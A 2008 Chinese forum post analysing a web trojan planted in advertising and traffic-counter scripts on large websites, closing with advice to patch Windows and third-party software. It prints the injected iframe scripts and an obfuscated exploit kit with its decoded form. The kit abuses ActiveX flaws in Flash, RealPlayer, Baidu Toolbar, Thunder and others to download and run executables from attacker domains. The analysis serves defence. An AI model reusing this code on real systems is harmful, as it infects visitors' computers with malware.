近期发现多个大型网站都被挂上了网页木马,浏览该被挂马网页后后台自动下载路径为
http://eirte.cn/sina.exe下载者程序(
运行后自动下载运行作者指定的木马程序,并试图关闭各大杀毒软件),国产软件基本上无察觉,
NOD32,费尔托斯特安全均有提示,察看这些网站的源码后发现大部分网页木马都被多层包含在该网站投放
广告或流量统计的JS里.
JS包含网页木马:
----------------------------------click.js--------------------------------------------------
var cookieString = new String(document.cookie);
var cookieHeader = 'ises' ;
var Then = new Date();
Then.setTime(Then.getTime() + 30*60*1000 );
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
{
document.write('<** height=0 frameborder=1 src=
http://yangzia.cn/page/add_54738542.htm width=100 ></**>');
document.cookie = Cookieak=ises;expires=+ Then.toGMTString() +;path=/;
}
-----------------------------------addr.js---------------------------------------------------
window[document].write('<** width=100 height=0 src=http://taiaer.cn/news.html></**>');
-------------------------------------news.html---------------------------------------------------
<**>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('n{3 b;3 1D=p m(1E.1F.1)}o(b){};q{5(b!=[4 8]){d.r('<4 1j=1k:1G-1C-1B-1x-1w 1y=19 1b=0 1e=0></4>');19[1z](c://k.l/1A.18)}}n{3 e;3 1H=1I#*&$1Q;3 P=d.1f(4);5(1h.1g.17().15(16 7)==-1)P.T(1j,1k:1R-1v-1T-1P-1O);3 1K=P.1J(1L.1M,)}o(e){};q{5(e!=[4 8]){d.r(<L t=c:\/\/k.l\/1N.1n><\/L>)}1p{n{3 f;3 1a=(p m(10.10.9)).1U($1s).1u(,)}o(f){};q{5(f!=[4 8]){5(1h.1g.17().15(16)>0){d.r('<1c t=c://k.l/'+1a[2]+'.1t></1c>')}}}n{3 g;3 E=p m(\a\a\a\1S\X\1Z\1m\v\B\x\a\a\a\S\2i\1d\C\z\N\w\K\1d\G\x\A)}o(g){};q{5(g!=[4 8]){3 Y=c://k.l/;E=d.1f(\D\2j\2g\N\O\K);Z=\J\A\w\2d\2e\J\2f\u\u\u\J\y\B\y;U=\A\J\2l\B\y\13\2k\y\1l\w\y\A\13\u;W=\O\G\M\H\z\2p\1l\w\1m\w\v\2q\u\u;E.T(\O\G\C\M\M\H\z,W+Z+U);E[\a\S\z\C\K\N](\\1V 11\\2n 11\\2m\\,Y+\a\a\x\H\R\H,,1)}}n{3 h;3 2b=p m(\X\2c\V\B\v\D\12\R\x\V\B\v\D\12\R\x\A)}o(h){};q{5(h!=[4 8]){d.r('<s 1r=1q:1o t=c://k.l/21.Q></s>')}}n{3 i;3 1i=p m(F.F.1)}o(i){};q{5(i!=[4 8]){5(p m(F.F.1).22(20)<=6.0.14.1X){d.r('<1Y 23=24 t=c:\/\/k.l\/1i.1n><\/L>')}1p{d.r('<s 1r=1q:1o t=c://k.l/2a.Q></s>')}}}n{3 j;3 I=p m(28.27)}o(j){};q{5(j!=[4 8]){I[\v\G\D\C\z\v\25](c://k.l/I.26,I.18,0)}}5(f==[4 8]&&g==[4 8]&&h==[4 8]&&i==[4 8]){n{5(p m(29.1W))d.r('<s 1b=2o 1e=0 t=c://k.l/2h.Q></s>')}o(e){}}}}',62,151,'|||var|object|if|||Error||x55||http|document|||||||eirte|cn|ActiveXObject|try|catch|new|finally|write|**|src|x42|x44|x43|x2e|x38|x64|x31|x45|x61|x6f|storm|IERPCtl|x6c|x69|Baidu|x2d|x74|**|x73|x65|x63|ado|html|x6e|x70|setAttribute|getSpraySlide|x49|helloworld2Address|x47|url|ActivePerl|ShockwaveFlash|Files|x77|x33||indexOf|msie|toLowerCase|exe|install|Flashver|width|embed|x72|height|createElement|userAgent|navigator|real|classid|clsid|x32|x41|js|none|else|display|style|version|swf|split|65A3|9A0918C52B4A|9A76|id|DownloadAndInstall|sina|44D3|D8E7|gw|Downloader|DLoader|78ABDC59|fderer|dfk|createobject|as|Adodb|Stream|ms06014|00C04FC29E36|983A|FEFsdfdsfds|BD96C556|x50|11D0|GetVariable|Program|Vod|552|sCrIpT|x52|PRODUCTVERSION|GLWORLD|PlayerProperty|LAnGuAgE|jAvAsCrIpT|x53|cab|Tool|BaiduBar|DPClient|Real|glworld|x4c|x35|x39|x34|x6a|Thunder|x67|x62|x46|x36|uusee|Common|100|x3a|x37'.split('|'),0,{}))
</**>
解密后得出:
-------------------------------------news.html解密后------------------------------------------
<**>
try{var b;var gw=new ActiveXObject(Downloader.DLoader.1)}catch(b){};finally{if(b!=[object Error]){document.write('<object classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A id=install width=0 height=0></object>');install[DownloadAndInstall](http://eirte.cn/sina.exe)}}try{var e;var fderer=dfk#*&$FEFsdfdsfds;var ado=document.createElement(object);if(navigator.userAgent.toLowerCase().indexOf(msie 7)==-1)ado.setAttribute(classid,clsid:BD96C556-65A3-11D0-983A-00C04FC29E36);var as=ado.createobject(Adodb.Stream,)}catch(e){};finally{if(e!=[object Error]){document.write(<** src=http://eirte.cn/ms06014.js></**>)}else{try{var f;var Flashver=(new ActiveXObject(ShockwaveFlash.ShockwaveFlash.9)).GetVariable($version).split(,)}catch(f){};finally{if(f!=[object Error]){if(navigator.userAgent.toLowerCase().indexOf(msie)>0){document.write('<embed src=http://eirte.cn/'+Flashver[2]+'.swf></embed>')}}}try{var g;var storm=new ActiveXObject(UUUPGRADE.UUUpgradeCtrl.1)}catch(g){};finally{if(g!=[object Error]){var url=http://eirte.cn/;storm=document.createElement(object);ActivePerl=-1C59-4BBB-8E8;getSpraySlide=1-6E83F82C813B;helloworld2Address=clsid:2CACD7BB;storm.setAttribute(classid,helloworld2Address+ActivePerl+getSpraySlide);storm[Update](\Program Files\Common Files\uusee\,url+UU.ini,,1)}}try{var h;var glworld=new ActiveXObject(GLIEDown.IEDown.1)}catch(h){};finally{if(h!=[object Error]){document.write('<** style=display:none src=http://eirte.cn/GLWORLD.html></**>')}}try{var i;var real=new ActiveXObject(IERPCtl.IERPCtl.1)}catch(i){};finally{if(i!=[object Error]){if(new ActiveXObject(IERPCtl.IERPCtl.1).PlayerProperty(PRODUCTVERSION)<=6.0.14.552){document.write('<sCrIpT LAnGuAgE=jAvAsCrIpT src=http://eirte.cn/real.js></**>')}else{document.write('<** style=display:none src=http://eirte.cn/Real.html></**>')}}}try{var j;var Baidu=new ActiveXObject(BaiduBar.Tool)}catch(j){};finally{if(j!=[object Error]){Baidu[DloadDS](http://eirte.cn/Baidu.cab,Baidu.exe,0)}}if(f==[object Error]&&g==[object Error]&&h==[object Error]&&i==[object Error]){try{if(new ActiveXObject(DPClient.Vod))document.write('<** width=100 height=0 src=http://eirte.cn/Thunder.html></**>')}catch(e){}}}}
</**>
智能型的网页木马,利用COOKIE做判断,一台
电脑24小时内有效读取一次该代码.利用了多种第三方程序漏洞:FLASH播放器 realplay播放器,百度搜霸工具条,讯雷漏洞,所以一定要打好系统和第三方软件的全补丁,建议大家下载一个360安全卫士,用来打补丁还是很不错的
- 该帖于 2008-7-18 11:45:00 被修改过
